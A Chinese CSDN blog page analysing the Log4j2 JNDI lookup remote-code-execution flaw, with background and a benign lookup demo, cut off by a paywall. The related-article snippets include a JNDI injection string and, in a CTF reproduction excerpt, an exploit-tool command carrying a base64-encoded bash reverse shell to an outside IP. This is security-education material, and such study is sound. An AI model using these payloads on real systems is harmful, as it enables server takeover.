深入分析Log4j 漏洞

最新推荐文章于 2024-07-02 22:53:38 发布
最新推荐文章于 2024-07-02 22:53:38 发布
阅读量1.8w 收藏 16
点赞数 2
文章标签: java 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyu7448/article/details/121985812
版权
本文深入探讨了Apache Log4j2的安全漏洞,该漏洞允许黑客通过构造特定输入执行任意代码,影响广泛。文章详细介绍了Log4j的lookup功能设计缺陷,受影响的版本与框架,并提供了漏洞复现步骤。同时,给出了设置JVM参数、环境变量以及升级Log4j版本的修复建议。
摘要由CSDN通过智能技术生成

几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的。

Apache Log4j2 是一个基于 Java 的日志工具,是Log4j的升级版本,引入了很多丰富的特性,包括高性能,低垃圾收集,插件系统等。目前很多互联网公司以及耳熟能详的公司的系统或者开源框架都在使用Log4j2。

2021.12.7,Log4j首次被发现了一个非常严重的漏洞,在当天Log4j就发布了log4j-2.15.0-rc1,但是12.9那天被发现这个版本仍然可以触发漏洞。简单点说,黑客可以恶意构造特殊数据请求包payload触发漏洞,从而可以在目标服务器上执行任意代码,导致服务器被黑客控制,被定性为“过去十年来最大、最关键的漏洞”。

根据目前统计,90%以上基于java开发的应用平台都会受到影响。那么这篇文章就会深入分析这个漏洞究竟是怎么产生的以及怎么修复它。

1. Log4j简介

Apache Log4j 是一个基于Java的日志记录工具。它是由Ceki Gülcü首创的,现在已经发展为Apache软件基金会的项目之一。

经过多年的开发迭代,Log4j 1.x的维护已经变得非常困难,因为它需要与非常旧的 Java 版本兼容,所以于 2015 年 8 月正式升级为Log4j2。

2. Log4j的lookup功能

本次漏洞是因为Log4j2组件中 lookup功能的实现类 JndiLookup 的设计缺陷导致,这个类存在于log4j-core-xxx.jar中。

lo77lI

log4j的Lookups功能可以快速打印包括运行应用容器的docker属性,环境变量,日志事件,Java应用程序环境信息等内容。比如我们打印Java运行时版本:

public class VulnerabilityTest {
   
    private static final Logger LOGGER = LogManager.getLogger();

    public static void main(String[] args) {
   
        LOGGER.error("Test:{}","${java:runtime}");
    }
}

输出:

20:20:21.312 [main] ERROR com.ldbmcs.VulnerabilityTest - OpenJDK Runtime Environment (build 11.0.11+9) from AdoptOpenJDK

那么JndiLookup到底有什么设计缺陷导致出现的史诗级漏洞呢?

我们首先把目标放在org.apache.logging.log4j.core.patte

最低0.47元/天 解锁文章
程序员星空
关注
  • 2
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
log4j漏洞原理及攻击流程
weixin_54603520的博客
05-14 2369
log4j漏洞最早出现在2021年11月24日一位阿里安全团队的员工发现的,上报到Apache之后,12月10日凌晨才被公开。该漏洞威胁等级较高。基本比肩与阿里当年的fastjson漏洞
Log4j漏洞分析
a1290320893的博客
12-13 2618
先看问题: 原本我只是希望logger.info(“hello,{}”,message); 用message来替换{}输出:hello,pxq; 但是假如我的message是${java:os},就是输出设备的具体信息;像这种可能存在隐患; 进一步如果String strings = “${jndi:rmi://127.0.0.1:1899/asd}”; 就会去执行注册中心127.0.0.1:1899中的名为asd的服务,只要用户使用了logger.info()且版本在log4j-api的版本在2.14.0
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
Log4j日志框架讲解(全面,详细)
最新发布
smilehjl
07-02 1781
Log4j是Apache下的一款开源的日志框架,通过在项目中使用 Log4J,我们可以控制日志信息输出到控制台、文件、甚至是数据库中。我们可以控制每一条日志的输出格式,通过定义日志的输出级别,可以 更灵活的控制日志的输出过程。方便项目的调试。log4j这个日志框架是现在那些流行的日志框架实现的始祖,现在流行的logback,log4j2这些都是基于或者参考log4j这个日志框架实现的,所以学习log4j可以让我们更好的理解和使用现在流行的主流日志框架。
log4j漏洞分析及总结
热门推荐
csd_ct的专栏
02-14 4万+
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。 漏洞描述及影响 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。
log4j漏洞详解
weixin_61638307的博客
03-21 3986
JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,举个例子:它就相当于的你的一个秘书,用了一些手段,你可以去指使他去干一些事情,这个手段就是lookup(),相当于你给秘书一个目标。先给这些名词简单说一下Ldap:你可以将它理解为一个目标数据库。
log4j漏洞分析
遇事不决冲冲冲
03-22 2328
Log4j漏洞复现步骤,Log4j断点分析,Log4j漏洞中2.15.0-RC1断定分析,以及绕过方法,Log4j2.15.0-RC2修复原理
log4j2漏洞检测工具
05-07
2. **深度分析**: 工具会深入分析代码,找出所有使用Log4j2的地方,特别是那些可能接收用户输入或网络数据的地方,这些地方是漏洞可能被触发的关键点。 3. **风险评估**: 工具能够评估每个检测到的实例的风险等级,...
log4j log4j2 2.15.0漏洞解决
12-10
《深入解析Log4jLog4j2 2.15.0漏洞及解决方案》 在信息技术领域,日志记录是系统监控、故障排查和安全分析的重要环节。Log4jLog4j2作为Java平台广泛使用的日志框架,其性能高效、功能强大,深受开发者喜爱。...
log4j.1.2.17
02-22
《深入理解Log4j:基于1.2.17版本》 在软件开发过程中,日志记录是一项至关重要的任务,它能够帮助开发者在程序出现问题时迅速定位错误,同时也能记录系统运行状态,便于后期分析与优化。Log4j,作为Java世界中最...
log4j2_rce 项目
02-23
《深入理解Log4j2 RCE漏洞:从概念到实战》 在信息技术领域,安全问题始终是关注的焦点。本文将深入探讨一个重要的安全漏洞——Log4j2远程代码执行(RCE)漏洞,该漏洞曾引起全球广泛关注。我们将从项目标题"Log4j2...
log4j jar包
06-26
《深入理解Log4j:Apache日志框架的基石》 在Java编程领域,日志记录是不可或缺的一部分,它为开发者提供了程序运行时的详细信息,帮助调试和追踪问题。而Log4j,作为Apache软件基金会的一个项目,是Java平台上的一...
log4j漏洞是什么
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-18 1485
log4j漏洞是什么,Log4j 是一款开源软件,开发者已经将其集成到数百万个系统中。这种无孔不入、无处不在的软件中的漏洞有能力影响全世界的公司和组织(包括政府)。自从2021年11月曝光的Log4j漏洞已成为一大“持续性流行漏洞”,将在未来多年引发持续风险,换言之,这种无所不在的软件库的未经修复版本,将在未来十年或更长时间内继续留存在各类系统当中。同时,美国网络安全审查委员会预测,鉴于 Log4j的普遍存在,在未来十年中,易受攻击的版本仍将存在于系统中,我们将看到利用漏洞的方式不断演变,所有组织都应具备发
Log4j史诗级漏洞,从原理到实战,只用3个实例讲明白
程序新视界
12-13 1万+
背景 最近互联网技术圈最火的一件事莫过于Log4j2的漏洞了。同时也涌现出了各类分析文章,关于漏洞的版本、漏洞的原因、漏洞的修复、程序员因此加班等等。 经常看我文章的朋友都知道,面对这样热门有意思的技术点,怎能错过深入分析一波呢?大概你也已经听说了,造成漏洞的”罪魁祸首“是JNDI,今天我们就聊它。 JNDI,好熟悉,但……熟悉的陌生人?JNDI到底是个什么鬼?好吧,如果你已经有一两年的编程经验,但还不了解JNDI,甚至没听说过。那么,要么赶紧换工作,要么赶紧读读这篇文章。 JNDI是个什么鬼? 说起JND
“核弹级” Log4j 漏洞仍普遍存在,并造成持续影响
码农code之路
07-26 150
出品:OSCHINA,编辑:白开水不加糖来源:https://www.oschina.net/news/203874/log4j-the-pain-just-keeps-going-and-goingLog4j “核弹级” 漏洞 Log4Shell 或许将永远影响世界。美国国土安全部 (DHS) 网络安全审查委员会 (CSRB) 近日发布了针对去年Log4Shell漏洞...
JAVA安全--log4j漏洞研究分析
goddemon
03-12 1万+
log4j漏洞复现 复现 这里以bugku上的靶场为例进行复现 https://ctf.bugku.com/challenges/detail/id/340.html 环境配置 ①ldap服务 服务器起一个ldap服务就好了 直接执行反弹shell 即直接配置bash反弹shell命令 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTYuM
log4j漏洞
远行的博客
12-12 677
文章目录1JNDI 1 JNDI https://blog.csdn.net/liushuai_ly/article/details/8634957 https://blog.csdn.net/liushuai_ly/article/details/8634957
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值